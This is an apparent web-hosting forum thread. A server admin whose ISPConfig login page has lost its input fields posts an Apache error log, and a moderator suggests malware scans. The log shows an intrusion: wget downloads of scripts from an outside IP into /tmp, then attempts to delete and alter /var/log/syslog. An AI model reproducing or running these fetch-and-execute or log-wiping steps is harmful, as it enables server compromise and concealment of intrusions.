#1  
Old 5th March 2014, 02:22
jopa123 jopa123 is offline
Senior Member
 
Join Date: Feb 2007
Posts: 140
Thanks: 10
Thanked 1 Time in 1 Post
Default No login boxes

Hey guys,

I've got ISPConfig 3 running on Ubuntu 9.04. It's been great for quite some time.

However, for some reason I no longer have boxes available to log into the admin page. The login page comes up with the usual look, just no place to enter admin credentials.

I'm sure it is something I did but I am stumped.

Any ideas?

Thanks in advance for any help.
Reply With Quote
Sponsored Links
  #2  
Old 5th March 2014, 08:21
till till is offline
Super Moderator
 
Join Date: Apr 2005
Location: Lneburg, Germany
Posts: 36,395
Thanks: 833
Thanked 5,490 Times in 4,322 Posts
Default

Take a look at the apache error.log. maybe you changed some php.ini settings that prevent ispconfig to work.
__________________
Till Brehm
--
Get ISPConfig support and the ISPConfig 3 manual from ispconfig.org.
Reply With Quote
  #3  
Old 5th March 2014, 13:24
jopa123 jopa123 is offline
Senior Member
 
Join Date: Feb 2007
Posts: 140
Thanks: 10
Thanked 1 Time in 1 Post
Default error.log

Till,

Thanks for the response. Following is my Apache2 error.log file. I don't know what I'm looking at but the one thing that sticks out is the repeated connections to 221.132.37.26:80. This is not my IP address. Neither is 54.246.4.70. Does anything else look out of place? If this is something I should not post here, please let me know.


[Sun Mar 02 06:50:21 2014] [notice] Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8g configured -- resuming normal operations
[Sun Mar 02 06:50:21 2014] [warn] long lost child came home! (pid 14375)
[Sun Mar 02 06:50:21 2014] [notice] mod_fcgid: call /var/www/linkplazas.info/web/index.php with wrapper /var/www/php-fcgi-scripts/web10/.php-fcgi-starter
[Sun Mar 02 06:50:43 2014] [notice] mod_fcgid: call /var/www/linkplazas.info/web/index.php with wrapper /var/www/php-fcgi-scripts/web10/.php-fcgi-starter
[Sun Mar 02 06:55:17 2014] [notice] mod_fcgid: call /var/www/goodcarinsurance.net/web/compare-car-insurance-rate.php with wrapper /var/www/php-fcgi-scripts/web15/.php-fcgi-starter
[Sun Mar 02 07:10:16 2014] [error] [client 130.185.109.239] File does not exist: /var/www/robots.txt
[Sun Mar 02 07:26:31 2014] [notice] mod_fcgid: call /var/www/rockwalldata.com/web/index.php with wrapper /var/www/php-fcgi-scripts/web23/.php-fcgi-starter
[Sun Mar 02 08:18:01 2014] [notice] mod_fcgid: call /var/www/lakesideambucs.org/web/index.php with wrapper /var/www/php-fcgi-scripts/web29/.php-fcgi-starter
[Sun Mar 02 09:14:34 2014] [error] [client 37.9.53.129] File does not exist: /var/www/administrator
[Sun Mar 02 09:28:47 2014] [error] [client 66.249.79.82] File does not exist: /var/www/robots.txt
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] --2014-03-02 09:36:45-- http://221.132.37.26/sh
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] Connecting to 221.132.37.26:80...
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] connected.
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] HTTP request sent, awaiting response...
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] 200 OK
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] Length: 1069 (1.0K) [text/plain]
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] Saving to: `/tmp/sh'
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70]
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] 0K . 100% 103M=0s
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70]
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] 2014-03-02 09:36:45 (103 MB/s) - `/tmp/sh' saved [1069/1069]
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70]
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] rm:
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] cannot remove `/var/log/syslog'
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] : Permission denied
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70]
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] touch:
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] cannot touch `/var/log/syslog'
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] : Permission denied
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70]
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] chmod:
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] changing permissions of `/var/log/syslog'
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] : Operation not permitted
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70]
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] chattr: Permission denied
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] while reading flags on /var/log/syslog\r
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] --2014-03-02 09:36:48-- http://221.132.37.26/ru
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] Connecting to 221.132.37.26:80...
[Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] connected.
[Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] HTTP request sent, awaiting response...
[Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] 200 OK
[Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] Length: 944 [text/plain]
[Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] Saving to: `ru'
[Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70]
[Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] 0K 100% 84.9M=0s
[Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70]
[Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] 2014-03-02 09:36:49 (84.9 MB/s) - `ru' saved [944/944]
[Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70]
[Sun Mar 02 09:36:50 2014] [error] [client 54.246.4.70] --2014-03-02 09:36:50-- http://221.132.37.26/rr
[Sun Mar 02 09:36:50 2014] [error] [client 54.246.4.70] Connecting to 221.132.37.26:80...
[Sun Mar 02 09:36:50 2014] [error] [client 54.246.4.70] connected.
Reply With Quote
  #4  
Old 5th March 2014, 17:14
jopa123 jopa123 is offline
Senior Member
 
Join Date: Feb 2007
Posts: 140
Thanks: 10
Thanked 1 Time in 1 Post
Default Have I been hacked?

It looks like illegal calls are being made.
Reply With Quote
  #5  
Old 17th March 2014, 03:31
jopa123 jopa123 is offline
Senior Member
 
Join Date: Feb 2007
Posts: 140
Thanks: 10
Thanked 1 Time in 1 Post
Default

I'm assuming my box is hacked. Do I have any options other than wiping it and starting over?
Reply With Quote
  #6  
Old 17th March 2014, 11:20
till till is offline
Super Moderator
 
Join Date: Apr 2005
Location: Lneburg, Germany
Posts: 36,395
Thanks: 833
Thanked 5,490 Times in 4,322 Posts
Default

According to the log, just a website is hacked. So it might not be nescessary to reinstall the whole server. Chcek the /tmp directory for unusual files and post a :

ls -la /tmp

to see which user owns these files. Then you should scan the server with rkhunter and maldetect:

http://www.howtoforge.com/forums/sho...87&postcount=9
__________________
Till Brehm
--
Get ISPConfig support and the ISPConfig 3 manual from ispconfig.org.
Reply With Quote
The Following User Says Thank You to till For This Useful Post:
jopa123 (18th March 2014)
  #7  
Old 18th March 2014, 03:52
jopa123 jopa123 is offline
Senior Member
 
Join Date: Feb 2007
Posts: 140
Thanks: 10
Thanked 1 Time in 1 Post
Default

Thanks, Till,

Here is the ls la /tmp

total 80
drwxrwxrwx 4 root root 65536 2014-03-17 21:35 .
drwxr-xr-x 22 root root 4096 2014-03-17 18:39 ..
drwxrwxrwt 2 root root 4096 2014-03-17 18:39 .ICE-unix
drwxrwxrwt 2 root root 4096 2014-03-17 18:39 .X11-unix

I ran maldetect and it found and quarantined 5 items. This may have fixed my issues but I don't know since I still do not have login boxes for the ISPConfig admin page. So I can't log in.

I installed RKHunter but it would not run. User error I'm sure. I get the following error.

'Invalid SCRIPTWHITELIST configuration option: Non-existent pathname: /usr/sbin/prelink'

Very grateful for any and all help.
Reply With Quote
  #8  
Old 18th March 2014, 15:29
jopa123 jopa123 is offline
Senior Member
 
Join Date: Feb 2007
Posts: 140
Thanks: 10
Thanked 1 Time in 1 Post
Default DNS issues?

In the interest of full disclosure, here are some more symptoms that could be entirely unrelated.

1) I recently was forced to switch ISP's. I am now on AT&T
2) When the server is plugged in I seem to have basic surfing issues with other computers in my network.
3) The issues seem to be DNS related. Websites become slow to respond and there seems to be trouble "resolving host"

Could the server be overriding DNS calls or something? I feel I could investigat more if I could just log in to ISPConfig.

Thanks again.
Reply With Quote
  #9  
Old 27th March 2014, 22:14
jopa123 jopa123 is offline
Senior Member
 
Join Date: Feb 2007
Posts: 140
Thanks: 10
Thanked 1 Time in 1 Post
Default

Any suggestions on how I can get my login boxes back on the admin login page?
Reply With Quote
  #10  
Old 28th March 2014, 08:20
till till is offline
Super Moderator
 
Join Date: Apr 2005
Location: Lneburg, Germany
Posts: 36,395
Thanks: 833
Thanked 5,490 Times in 4,322 Posts
 
Default

which error do you get in the apache error.log, when you open the ispconfig controlpanel page?
__________________
Till Brehm
--
Get ISPConfig support and the ISPConfig 3 manual from ispconfig.org.
Reply With Quote
Reply

Bookmarks

Tags
boxes, login, missing

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
postfix problems kwickcut Installation/Configuration 6 5th March 2012 19:19
Fail2ban configuration Captain Installation/Configuration 2 28th June 2011 19:48
F11 courier-imap fails. Nachogrande General 6 1st November 2010 17:55
squirrelmail and postfix witoszek General 12 1st December 2009 18:07
Postfix can't received email from exterior astra2000 Server Operation 5 17th October 2009 23:26


All times are GMT +2. The time now is 21:26.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.